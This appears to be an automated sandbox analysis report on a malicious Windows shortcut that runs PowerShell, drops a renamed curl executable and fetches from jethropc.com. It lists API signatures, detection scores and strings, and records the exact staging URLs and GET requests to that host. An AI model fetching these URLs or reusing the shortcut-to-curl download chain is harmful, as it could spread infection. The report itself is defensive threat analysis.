Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DEBAFC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

8_2_00007FF7F1DEBAFC

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDF964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	8_2_00007FF7F1DDF964
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DB2B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	8_2_00007FF7F1DB2B14
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD2930 calloc,inet_pton,strncpy,strtoul,strtoul,getsockname,WSAGetLastError,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,__swprintf_l,__swprintf_l,free,	8_2_00007FF7F1DD2930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DD0070 calloc,calloc,calloc,bind,WSAGetLastError,	8_2_00007FF7F1DD0070
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8F964 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,	12_2_00007FF700E8F964
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E82930 calloc,inet_pton,strncpy,strtoul,strtoul,getsockname,WSAGetLastError,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,__swprintf_l,__swprintf_l,free,	12_2_00007FF700E82930
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E62B14 strncmp,strncmp,inet_pton,htons,bind,inet_pton,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,	12_2_00007FF700E62B14
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E80070 calloc,calloc,calloc,bind,WSAGetLastError,	12_2_00007FF700E80070

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.241.216.65	jethropc.com	United States		46606	UNIFIEDLAYER-AS-1US	true

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
jethropc.com	162.241.216.65	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0	false	Avira URL Cloud: safe	unknown
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1	false	Avira URL Cloud: safe	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for submitted file

Source: knfV5IVjEV.lnk	ReversingLabs: Detection: 21%
Source: knfV5IVjEV.lnk	Virustotal: Detection: 29%			Perma Link

Machine Learning detection for sample

Source: knfV5IVjEV.lnk

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDCB60 _strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,	8_2_00007FF7F1DDCB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDF310 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	8_2_00007FF7F1DDF310
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DDF4E0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	8_2_00007FF7F1DDF4E0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE64F0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	8_2_00007FF7F1DE64F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE9C9C CryptHashData,	8_2_00007FF7F1DE9C9C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE9C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	8_2_00007FF7F1DE9C20
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE9BD0 CryptAcquireContextA,CryptCreateHash,	8_2_00007FF7F1DE9BD0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE934C CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,	8_2_00007FF7F1DE934C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE8F14 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	8_2_00007FF7F1DE8F14
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE6560 CryptHashData,	8_2_00007FF7F1DE6560
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 8_2_00007FF7F1DE6570 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	8_2_00007FF7F1DE6570
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8CB60 _strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,	12_2_00007FF700E8CB60
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8F310 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,	12_2_00007FF700E8F310
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E99BD0 CryptAcquireContextA,CryptCreateHash,	12_2_00007FF700E99BD0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E9934C CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,	12_2_00007FF700E9934C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E964F0 CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,	12_2_00007FF700E964F0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E8F4E0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	12_2_00007FF700E8F4E0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E99C9C CryptHashData,	12_2_00007FF700E99C9C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E99C20 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	12_2_00007FF700E99C20
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E96570 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,	12_2_00007FF700E96570
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E96560 CryptHashData,	12_2_00007FF700E96560
Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: 12_2_00007FF700E98F14 CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,	12_2_00007FF700E98F14

Source: C:\GSlLzFnTov\GSlLzFnTov.exe	Code function: -----BEGIN PUBLIC KEY-----		8_2_00007FF7F1DBD6F4
Source: GSlLzFnTov.exe	Binary or memory string: -----BEGIN PUBLIC KEY-----

Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.65:443 -> 192.168.2.10:49713 version: TLS 1.2

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: lib.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: on.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.1453710911.0000026329A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1437718358.0000026329676000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: curl.pdb source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr
Source:	Binary string: .pdb8; source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 089\System.Core.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *on.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\GSlLzFnTov\GSlLzFnTov.exe

Code function: 8_2_00007FF7F1DB20E0 malloc,recv,send,WSAGetLastError,

8_2_00007FF7F1DB20E0

Source: global traffic	HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey0 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey1 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey0 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /wp-admin/css/temp/hurry/?rv=papago&za=honey1 HTTP/1.1Host: jethropc.comUser-Agent: curl/7.83.1Accept: /

Source: GSlLzFnTov.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Usage: curl [options...] <url>
Source: GSlLzFnTov.exe.1.dr	String found in binary or memory: Usage: curl [options...] <url>

Source: unknown

DNS traffic detected: queries for: jethropc.com

Source: powershell.exe, 00000003.00000002.1371102592.000001EFEF822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1371102592.000001EFEF965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1332486385.000002630F825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000003.00000002.1321328788.000001EFDF7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1332789256.00000263114C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1421186731.0000026321675000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/
Source: GSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/P
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/docs/copyright.html
Source: GSlLzFnTov.exe, 00000008.00000000.1395599061.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453696864.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460845940.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503652165.00007FF700EC0000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: GSlLzFnTov.exe, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: GSlLzFnTov.exe	String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: GSlLzFnTov.exe.1.dr	String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Source: powershell.exe, 00000006.00000002.1332789256.00000263116E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1332789256.0000026312AE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1385766867.000001EFF7B59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=
Source: knfV5IVjEV.lnk	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago
Source: GSlLzFnTov.exe, 0000000C.00000002.1482744214.000001C4E4517000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481469904.000001C4E455D000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1483163619.000001C4E4528000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481507863.000001C4E4527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: GSlLzFnTov.exe, 0000000C.00000002.1482744214.000001C4E4517000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0%
Source: GSlLzFnTov.exe, 00000008.00000003.1414842290.0000024D89B89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com
Source: GSlLzFnTov.exe, 00000008.00000003.1414909781.0000024D89B89000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1483163619.000001C4E4528000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 0000000C.00000003.1481507863.000001C4E4527000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0jethropc.com##
Source: GSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0rz
Source: GSlLzFnTov.exe, 00000008.00000002.1415329869.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000008.00000003.1415114903.0000024D89B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0wz
Source: GSlLzFnTov.exe, 0000000E.00000002.1503333491.0000022C409D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: GSlLzFnTov.exe, 00000009.00000002.1438709537.000002AD152F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1Pu_
Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1T
Source: GSlLzFnTov.exe, 00000009.00000002.1453222250.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436426767.000002AD15306000.00000004.00000020.00020000.00000000.sdmp, GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1e
Source: GSlLzFnTov.exe, 00000009.00000003.1435646730.000002AD15329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.com##O
Source: GSlLzFnTov.exe, 00000009.00000003.1435462912.000002AD15329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1jethropc.comqu
Source: GSlLzFnTov.exe, 0000000E.00000002.1503333491.0000022C409D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1ji2
